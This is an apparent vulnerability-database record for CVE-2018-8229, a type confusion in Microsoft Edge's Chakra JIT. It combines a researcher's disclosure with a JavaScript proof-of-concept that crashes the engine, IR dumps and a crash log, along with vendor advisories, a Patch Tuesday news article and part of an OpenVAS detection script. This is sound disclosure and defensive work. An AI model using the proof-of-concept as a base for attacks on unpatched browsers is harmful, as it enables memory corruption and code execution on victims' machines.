SIGSEGV\r\n0x00007ff7f385017a in ?? ()\r\n \r\n \r\nBackground:\r\nInvariant operations like SetConcatStrMultiItemBE in a loop can be hoisted to the landing pad of the loop to avoid performing the same operation multiple times. When Chakra hoists a SetConcatStrMultiItemBE instruction, it creates a new Conv_PrimStr instruction to ensure the type of the Src1 of the SetConcatStrMultiItemBE instruction to be String and inserts it right before the SetConcatStrMultiItemBE instruction.\r\n \r\nWhat happens here is:\r\n1. The CheckFixedFld instruction ensures the type of s7 to be String.\r\n2. Chakra judges that the CheckFixedFld instruction can't be hoisted in the case. It remains in the loop.\r\n3. Chakra judges that the SetConcatStrMultiItemBE instructions can be hoisted. It hoists them along with a newly created Conv_PrimStr instruction, but without invalidating the type of s7 (String).\r\n4. So the \"s49[String].var = Conv_PrimStr s7<s44>[String].var\" instruction is inserted into the landing pad. 
Since s7 is already assumed to be of String, the instruction will have no effects at all.\r\n5. No type check will be performed. It will result in type confusion.\r\n*/\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30708"}], "packetstorm": [{"lastseen": "2018-07-13T17:34:27", "description": "", "published": "2018-07-12T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT SetConcatStrMultiItemBE Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8229"], "modified": "2018-07-12T00:00:00", "id": "PACKETSTORM:148527", "href": "https://packetstormsecurity.com/files/148527/Microsoft-Edge-Chakra-JIT-SetConcatStrMultiItemBE-Type-Confusion.html", "sourceData": "`Microsoft Edge: Chakra: JIT: Type confusion with hoisted SetConcatStrMultiItemBE instructions \n \nCVE-2018-8229 \n \n \nHere's a PoC: \nfunction opt(str) { \nfor (let i = 0; i < 200; i++) { \nlet tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB'); \n} \n} \n \nopt('x'); \nopt(0x1234); \n \n \nHere's the IR code of the PoC before the global optimization phase: \n--------- \nFunctionEntry # \ns18.u64 = ArgIn_A prm1<32>.var # \ns9.var = LdSlot s32(s18l[53]).var # \ns7.var = LdSlot s20(s18l[51]).var # \ns8.var = LdSlot s19(s18l[52]).var # \ns1[Object].var = Ld_A 0x7FFFF47A0000 (GlobalObject)[Object].var # \ns2.var = LdC_A_I4 0 (0x0).i32 # \ns3.var = LdC_A_I4 200 (0xC8).i32 # \ns4.var = LdC_A_I4 1 (0x1).i32 # \ns5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var # \ns6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var # \ns17.var = InitLoopBodyCount #0009 \n--------- \n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \n \n \nLine 2: i < 200; i++) { \nCol 21: ^ \nStatementBoundary #1 #000b \ns17.i32 = IncrLoopBodyCount s17.i32 #000b \nBrLt_A $L3, s8.var, s3.var #000b \nBr $L2 #0010 \n--------- \n$L3: #0013 \n \n \nLine 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 
'BBBBBBBBBB'); \nCol 9: ^ \nStatementBoundary #2 #0013 \ns13.var = Ld_A s7.var #0013 \nCheckFixedFld s21(s13->charCodeAt)<0,m~=,+-,s?,s?>.var #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck) \ns12[ffunc][Object].var = Ld_A 0x7FFFF47972C0 (FunctionObject).var # \ns22.var = StartCall 2 (0x2).i32 #001a \ns36.var = BytecodeArgOutCapture s13.var #001d \ns24[String].var = Conv_PrimStr s5.var #0020 \ns25[String].var = Conv_PrimStr s7.var #0020 \ns26[String].var = Conv_PrimStr s6.var #0020 \nByteCodeUses s7 #0020 \ns27.var = SetConcatStrMultiItemBE s24[String].var #0020 \ns28.var = SetConcatStrMultiItemBE s25[String].var, s27.var #0020 \ns29.var = SetConcatStrMultiItemBE s26[String].var, s28.var #0020 \ns14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var #0020 \ns35.var = BytecodeArgOutCapture s14.var #0025 \narg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var #0028 \narg1(s23)<0>.var = ArgOut_A s36.var, s22.var #0028 \narg2(s30)<8>.var = ArgOut_A s35.var, arg1(s23)<0>.var #0028 \nByteCodeUses s12 #0028 \ns31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64 #0028 \ns9.var = Ld_A s31.var #0032 \n \n \nLine 2: i++) { \nCol 30: ^ \nStatementBoundary #3 #0035 \ns8.var = Incr_A s8.var #0035 \nBr $L1 #0038 \n--------- \n$L2: #003d \n \n \nLine 5: } \nCol 1: ^ \nStatementBoundary #4 #0038 \ns16.i64 = Ld_I4 61 (0x3D).i64 #003d \ns19(s18l[52]).var = StSlot s8.var #003e \ns32(s18l[53]).var = StSlot s9.var #003e \nStLoopBodyCount s17.i32 #003e \nRet s16.i64 #003e \n---------------------------------------------------------------------------------------- \n \nAfter the global optimization phase: \n--------- \nFunctionEntry # \ns18.u64 = ArgIn_A prm1<32>.var! # \ns9[LikelyCanBeTaggedValue_Int].var = LdSlot s32(s18l[53])[LikelyCanBeTaggedValue_Int].var! # \ns7<s44>[LikelyCanBeTaggedValue_String].var = LdSlot s20(s18l[51])[LikelyCanBeTaggedValue_String].var! 
# \ns8[LikelyCanBeTaggedValue_Int].var = LdSlot s19(s18l[52])[LikelyCanBeTaggedValue_Int].var! # \ns5[String].var = LdStr 0x7FFFF47B9080 (\"AAAAAAAAAA\")[String].var # \ns6[String].var = LdStr 0x7FFFF47B90A0 (\"BBBBBBBBBB\")[String].var # \ns17.var = InitLoopBodyCount #0009 \ns42(s8).i32 = FromVar s8[LikelyCanBeTaggedValue_Int].var # Bailout: #000b (BailOutIntOnly) \ns27.var = SetConcatStrMultiItemBE s5[String].var #0020 \ns49[String].var = Conv_PrimStr s7<s44>[String].var # \ns28.var = SetConcatStrMultiItemBE s49[String].var!, s27.var! #0020 \ns29.var = SetConcatStrMultiItemBE s6[String].var, s28.var! #0020 \ns14[String].var = NewConcatStrMultiBE 3 (0x3).u32, s29.var! #0020 \nBailTarget # Bailout: #000b (BailOutShared) \n--------- \n$L1: >>>>>>>>>>>>> LOOP TOP >>>>>>>>>>>>> Implicit call: no #000b \n \n \nLine 2: i < 200; i++) { \nCol 21: ^ \nStatementBoundary #1 #000b \ns17.i32 = IncrLoopBodyCount s17.i32! #000b \nBrGe_I4 $L2, s42(s8).i32, 200 (0xC8).i32 #000b \n \n \nLine 3: let tmp = str.charCodeAt('AAAAAAAAAA' + str + 'BBBBBBBBBB'); \nCol 9: ^ \nStatementBoundary #2 #0013 \nCheckFixedFld s43(s7<s44>[LikelyCanBeTaggedValue_String]->charCodeAt)<0,m~=,++,s44!,s45+,{charCodeAt(0)~=}>.var! #0016 Bailout: #0016 (BailOutFailedEquivalentFixedFieldTypeCheck) \ns22.var = StartCall 2 (0x2).i32 #001a \narg1(s34)<0>.u64 = ArgOut_A_InlineSpecialized 0x7FFFF47972C0 (FunctionObject).var, arg2(s30)<8>.var! #0028 \narg1(s23)<0>.var = ArgOut_A s7<s44>[String].var, s22.var! #0028 \narg2(s30)<8>.var = ArgOut_A s14[String].var, arg1(s23)<0>.var! #0028 \ns31[CanBeTaggedValue_Int_Number].var = CallDirect String_CharCodeAt.u64, arg1(s34)<0>.u64! #0028 Bailout: #0032 (BailOutOnImplicitCalls) \ns9[CanBeTaggedValue_Int_Number].var = Ld_A s31[CanBeTaggedValue_Int_Number].var! 
#0032 \n \n \nLine 2: i++) { \nCol 30: ^ \nStatementBoundary #3 #0035 \ns42(s8).i32 = Add_I4 s42(s8).i32!, 1 (0x1).i32 #0035 \nBr $L1 #0038 \n--------- \n$L2: #003d \n \n \nLine 5: } \nCol 1: ^ \nStatementBoundary #4 #003d \ns8[CanBeTaggedValue_Int].var = ToVar s42(s8).i32! #003e \ns19(s18l[52])[CanBeTaggedValue_Int].var! = StSlot s8[CanBeTaggedValue_Int].var! #003e \ns32(s18l[53])[LikelyCanBeTaggedValue_Int_Number].var! = StSlot s9[LikelyCanBeTaggedValue_Int_Number].var! #003e \nStLoopBodyCount s17.i32! #003e \nRet 61 (0x3D).i32 #003e \n---------------------------------------------------------------------------------------- \n \nCrash log: \n[----------------------------------registers-----------------------------------] \nRAX: 0x1000000001234 \nRBX: 0x7ffff47c5ff4 --> 0x31 ('1') \nRCX: 0x7ff7f4600000 --> 0x0 \nRDX: 0x0 \nRSI: 0x80000001 --> 0x0 \nRDI: 0x1000000001234 \nRBP: 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 --> 0x7fffffff48b0 (--> ...) 
\nRSP: 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \nRIP: 0x7ff7f385017a (cmp QWORD PTR [rax],r10) \nR8 : 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR9 : 0x7ff7f4600000 --> 0x0 \nR10: 0x55555cfbc870 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR11: 0x7ffff47b9080 --> 0x55555cfa0f18 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR12: 0x0 \nR13: 0x7ffff47b36b0 --> 0x55555cfbee70 --> 0x555557fc27e0 (<Js::RecyclableObject::Finalize(bool)>: push rbp) \nR14: 0x0 \nR15: 0x1000000001234 \nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) \n[-------------------------------------code-------------------------------------] \n0x7ff7f385016e: mov BYTE PTR [rcx+rax*1],0x1 \n0x7ff7f3850172: mov rax,QWORD PTR [rbp-0x10] \n0x7ff7f3850176: mov r10,QWORD PTR [rbp-0x18] \n=> 0x7ff7f385017a: cmp QWORD PTR [rax],r10 \n0x7ff7f385017d: je 0x7ff7f385037c \n0x7ff7f3850183: mov rcx,rax \n0x7ff7f3850186: mov QWORD PTR [rbp-0x18],rcx \n0x7ff7f385018a: mov eax,DWORD PTR [rcx+0x18] \n[------------------------------------stack-------------------------------------] \n0000| 0x7ffffffef340 --> 0x7ffffffef3b0 --> 0x1000000001234 \n0008| 0x7ffffffef348 --> 0x7ffff471c1e0 --> 0x55555cf48850 --> 0x555556c17100 (<Js::FunctionBody::Finalize(bool)>: push rbp) \n0016| 0x7ffffffef350 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \n0024| 0x7ffffffef358 --> 0x7ffff471c298 --> 0x7ffff4774140 --> 0x10f1215030708 \n0032| 0x7ffffffef360 --> 0x7ffffffef410 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 --> 0x7ffffffefef0 (--> ...) 
\n0040| 0x7ffffffef368 --> 0x555556c40b8b (<Js::CompactCounters<Js::FunctionBody, Js::FunctionBody::CounterFields>::Get(Js::FunctionBody::CounterFields) const+139>: movzx ecx,BYTE PTR [rbp-0x22]) \n0048| 0x7ffffffef370 --> 0x7ffff47a4238 --> 0x7ffff47c5fe0 --> 0x7ffff4796a40 --> 0x55555cf4df58 --> 0x555556cb7a20 (<JsUtil::List<Js::LoopEntryPointInfo*, Memory::Recycler, false, Js::CopyRemovePolicy, DefaultComparer>::IsReadOnly() const>: push rbp) \n0056| 0x7ffffffef378 --> 0x7ffffffef4a0 --> 0x7ffffffef4c0 --> 0x7ffffffef590 --> 0x7ffffffefb90 --> 0x7ffffffefc90 (--> ...) \n[------------------------------------------------------------------------------] \nLegend: code, data, rodata, value \nStopped reason: SIGSEGV \n0x00007ff7f385017a in ?? () \n \n \nBackground: \nInvariant operations like SetConcatStrMultiItemBE in a loop can be hoisted to the landing pad of the loop to avoid performing the same operation multiple times. When Chakra hoists a SetConcatStrMultiItemBE instruction, it creates a new Conv_PrimStr instruction to ensure the type of the Src1 of the SetConcatStrMultiItemBE instruction to be String and inserts it right before the SetConcatStrMultiItemBE instruction. \n \nWhat happens here is: \n1. The CheckFixedFld instruction ensures the type of s7 to be String. \n2. Chakra judges that the CheckFixedFld instruction can't be hoisted in the case. It remains in the loop. \n3. Chakra judges that the SetConcatStrMultiItemBE instructions can be hoisted. It hoists them along with a newly created Conv_PrimStr instruction, but without invalidating the type of s7 (String). \n4. So the \"s49[String].var = Conv_PrimStr s7<s44>[String].var\" instruction is inserted into the landing pad. Since s7 is already assumed to be of String, the instruction will have no effects at all. \n5. No type check will be performed. It will result in type confusion. \n \n \n \n \nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148527/GS20180712215007.txt"}], "kaspersky": [{"lastseen": "2020-09-02T11:57:18", "bulletinFamily": "info", "cvelist": ["CVE-2018-8229", "CVE-2018-8227", "CVE-2018-8243"], "description": "### *Detect date*:\n06/12/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft ChakraCore. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nChakraCore\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8227>) \n[CVE-2018-8229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8229>) \n[CVE-2018-8243](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8243>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[ChakraCore](<https://threats.kaspersky.com/en/product/ChakraCore/>)\n\n### *CVE-IDS*:\n[CVE-2018-8227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8227>)0.0Unknown \n[CVE-2018-8229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8229>)0.0Unknown \n[CVE-2018-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8243>)0.0Unknown\n\n### *Microsoft official advisories*:", "edition": 33, "modified": "2020-01-24T00:00:00", "published": "2018-06-12T00:00:00", "id": "KLA11264", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11264", "title": "\r KLA11264Multiple vulnerabilities in Microsoft ChakraCore ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": 
"AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:19", "bulletinFamily": "info", "cvelist": ["CVE-2018-8229", "CVE-2018-8249", "CVE-2018-0978", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8110", "CVE-2018-8234", "CVE-2018-8113", "CVE-2018-8267", "CVE-2018-8111", "CVE-2018-8227", "CVE-2018-8243", "CVE-2018-0871"], "description": "### *Detect date*:\n06/12/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browsers. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, obtain sensitive information.\n\n### *Affected products*:\nInternet Explorer 10 \nInternet Explorer 11 \nInternet Explorer 9 \nChakraCore \nMicrosoft Edge (EdgeHTML-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8227](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8227>) \n[CVE-2018-8229](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8229>) \n[CVE-2018-8236](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8236>) \n[CVE-2018-8113](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8113>) \n[CVE-2018-8234](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8234>) \n[CVE-2018-8249](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8249>) \n[CVE-2018-8110](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8110>) \n[CVE-2018-8235](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8235>) \n[CVE-2018-8267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8267>) \n[CVE-2018-0871](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-0871>) 
\n[CVE-2018-8111](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8111>) \n[CVE-2018-0978](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-0978>) \n[CVE-2018-8243](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8243>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8227>)0.0Unknown \n[CVE-2018-8229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8229>)0.0Unknown \n[CVE-2018-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8243>)0.0Unknown \n[CVE-2018-8236](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8236>)0.0Unknown \n[CVE-2018-8113](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8113>)0.0Unknown \n[CVE-2018-8234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8234>)0.0Unknown \n[CVE-2018-8249](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8249>)0.0Unknown \n[CVE-2018-8110](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8110>)0.0Unknown \n[CVE-2018-8235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8235>)0.0Unknown \n[CVE-2018-8267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8267>)0.0Unknown \n[CVE-2018-0871](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0871>)0.0Unknown \n[CVE-2018-8111](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8111>)0.0Unknown \n[CVE-2018-0978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0978>)0.0Unknown\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4284860](<http://support.microsoft.com/kb/4284860>) \n[4284874](<http://support.microsoft.com/kb/4284874>) \n[4284826](<http://support.microsoft.com/kb/4284826>) \n[4284835](<http://support.microsoft.com/kb/4284835>) 
\n[4284880](<http://support.microsoft.com/kb/4284880>) \n[4284819](<http://support.microsoft.com/kb/4284819>) \n[4230450](<http://support.microsoft.com/kb/4230450>) \n[4284855](<http://support.microsoft.com/kb/4284855>) \n[4284815](<http://support.microsoft.com/kb/4284815>) \n[4532693](<http://support.microsoft.com/kb/4532693>) \n[4532691](<http://support.microsoft.com/kb/4532691>)\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 34, "modified": "2020-06-18T00:00:00", "published": "2018-06-12T00:00:00", "id": "KLA11265", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11265", "title": "\r KLA11265Multiple vulnerabilities in Microsoft Internet Explorer & Edge ", "type": "kaspersky", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-05-30T05:52:23", "bulletinFamily": "info", "cvelist": ["CVE-2018-8140", "CVE-2018-8225", "CVE-2018-8229", "CVE-2018-8231", "CVE-2018-8248", "CVE-2018-8267"], "description": "Microsoft has fixed 11 critical bugs in its June Patch Tuesday update, including a Windows DNS-related remote code execution flaw. It also patched an easily exploitable problem in the Cortana voice engine.\n\nOne of the most serious issues is a critical remote code execution vulnerability ([CVE-2018-8225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8225>)) in the Windows Domain Name System (DNS), which could allow an attacker to take full control of the targeted machine. 
This can be carried out by sending a maliciously crafted DNS packet to the victim endpoint from a DNS server, or using spoofed DNS responses from an attack box, according to Microsoft\u2019s June Patch Tuesday security [bulletin](<https://portal.msrc.microsoft.com/en-us/security-guidance>).\n\n\u201cThe attacker could attempt to man-in-the-middle a legitimate query,\u201d explained Dustin Childs, researcher at the Zero Day Initiative, in its Patch Tuesday analysis [posted](<https://www.zerodayinitiative.com/blog/2018/6/12/the-june-2018-security-update-review>) on Tuesday. \u201cThe more likely scenario is simply tricking a target DNS server into querying an evil server that sends the corrupted response \u2013 something that can be done from the command line. It\u2019s also something that could be easily scripted. This means there\u2019s a system-level bug in a listening service on critical infrastructure servers, which also means this is wormable.\u201d\n\nHe added, \u201c\u2018patch now\u2019 doesn\u2019t even seem forceful enough. I have the sense we\u2019ll be hearing about this bug for a while.\u201d\n\nA privilege-escalation vulnerability rated important in Cortana ([CVE-2018-8140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8140>)) meanwhile is due to the voice engine\u2019s service retrieving data from input services \u201cwithout consideration for status,\u201d according to Microsoft. It was [first discussed](<https://www.youtube.com/watch?v=7AyW0lCCyGI>) in March at a researcher conference.\n\n\u201cWhile that description from Microsoft is a bit oblique, it seems someone close enough to speak to a Cortana-enabled system could execute programs with elevated privileges,\u201d said Childs. \u201cAgain, the attacker needs physical or console access to the system, so remote attacks not likely \u2013 provided you\u2019re not talking on a speakerphone. 
Jokes aside, with the proliferation of personal assistants and similar services, bugs in these products will likely become more prevalent in the years to come.\u201d\n\nResearchers put a finer point on it with a few [proof-of-concepts](<https://securingtomorrow.mcafee.com/mcafee-labs/want-to-break-into-a-locked-windows-10-device-ask-cortana-cve-2018-8140/>) for the Cortana flaw, demonstrating a range of attack vectors for accessing confidential information. For instance, after bypassing the locked screen using a simple voice command, McAfee found that it was possible to easily search for confidential information and files using Cortana to search for keywords such as \u201cOneDrive\u201d; and, the researchers were able to execute arbitrary code from the lock screen using Cortana\u2019s contextual menu. In a demo, they were able to carry out a full password reset and then log in on a Windows 10 build.\n\n\u201cThis particular vulnerability is not highly critical, but it is interesting as it targets a growing and popular class of technology: intelligent digital personal assistants,\u201d Lane Thames, senior security researcher at Tripwire, told Threatpost. \u201cWe\u2019ve already seen [weaknesses](<https://threatpost.com/voice-squatting-turns-alexa-google-home-into-silent-spies/132068/>) recently in Alexa due to third-party application issues. More of these types of problems will start to appear, most likely, in the years to come.\u201d\n\nIn total, Microsoft\u2019s June Patch Tuesday roundup included 50 security patches, with 11 listed as critical and 39 rated important. 
An out-of-band fix meanwhile was [released for Adobe Flash Player last week](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>).\n\nAmong the other notable patches is one for a memory corruption vulnerability in Microsoft Edge\u2019s Chakra scripting engine ([CVE-2018-8229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8229>)); this can be triggered when a victim visits a malicious website, where an attacker could use a specially crafted JavaScript program to execute arbitrary code. An attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights, Microsoft said.\n\n\u201cBecause JavaScript is so pervasive and needed for many websites to even operate, disabling the Chakra Scripting Engine is not an option, which means the vast majority of Microsoft Edge users are vulnerable to this attack,\u201d said Allan Liska, threat intelligence analyst at Recorded Future, via email. \u201cIt is important to patch Microsoft Edge as soon as possible to prevent this attack.\u201d\n\nThere\u2019s also a critical HTTP Protocol Stack remote code execution vulnerability ([CVE-2018-8231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8231>)) affecting the web server component http.sys, which confers elevated privileges to a remote attacker. The attacker can cause code execution by sending a malformed packet to a target server.\n\n\u201cThe patch notes that, \u2018in most situations, an unauthenticated attacker\u2019 could do this,\u201d ZDI\u2019s Childs said. \u201cIt\u2019s unclear what those other situations may be, but that puts this bug pretty close to the wormable category as well. 
Either way, this should also be near the top of your test and patch priority list.\u201d\n\nOther vulnerabilities being addressed include a remote code execution flaw in Excel ([CVE-2018-8248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8248>)); two privilege-escalation vulnerabilities in SharePoint Server and one in Office Web Apps Server; and seven separate Device Guard vulnerabilities in Windows 10 Enterprise and Server 2016 which allowed code integrity policies to be bypassed.\n\n\u201cJune\u2019s Patch Tuesday is rather run-of-the-mill, with a total of 50 vulnerabilities being addressed by Microsoft,\u201d said Greg Wiseman, senior security researcher at Rapid7, in an email. \u201cNone of the Microsoft vulnerabilities patched today have been seen in the wild, although [CVE-2018-8267 ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8267>)(an RCE vulnerability in Internet Explorer) had been publicly disclosed before today\u2019s release and is likely to be exploited soon if it hasn\u2019t already been.\u201d\n", "modified": "2018-06-12T21:36:17", "published": "2018-06-12T21:36:17", "id": "THREATPOST:455B7050303F6EBB708DA86EB2C4872C", "href": "https://threatpost.com/june-patch-tuesday-microsoft-issues-fixes-for-dns-cortana/132778/", "type": "threatpost", "title": "June Patch Tuesday: Microsoft Issues Critical Fixes for DNS, Cortana", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:06:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8225"], "description": 
"This host is missing a critical security\n update according to Microsoft KB4284860", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813529", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813529", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284860)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284860)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813529\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0978\", \"CVE-2018-1036\", \"CVE-2018-1040\", \"CVE-2018-8169\",\n \"CVE-2018-8201\", \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8209\",\n \"CVE-2018-8210\", \"CVE-2018-8212\", \"CVE-2018-8213\", \"CVE-2018-8215\",\n \"CVE-2018-8216\", \"CVE-2018-8217\", \"CVE-2018-8221\", \"CVE-2018-8225\",\n \"CVE-2018-8226\", \"CVE-2018-8229\", \"CVE-2018-8231\", \"CVE-2018-8234\",\n \"CVE-2018-8235\", \"CVE-2018-8236\", \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:08:36 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284860)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284860\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - 
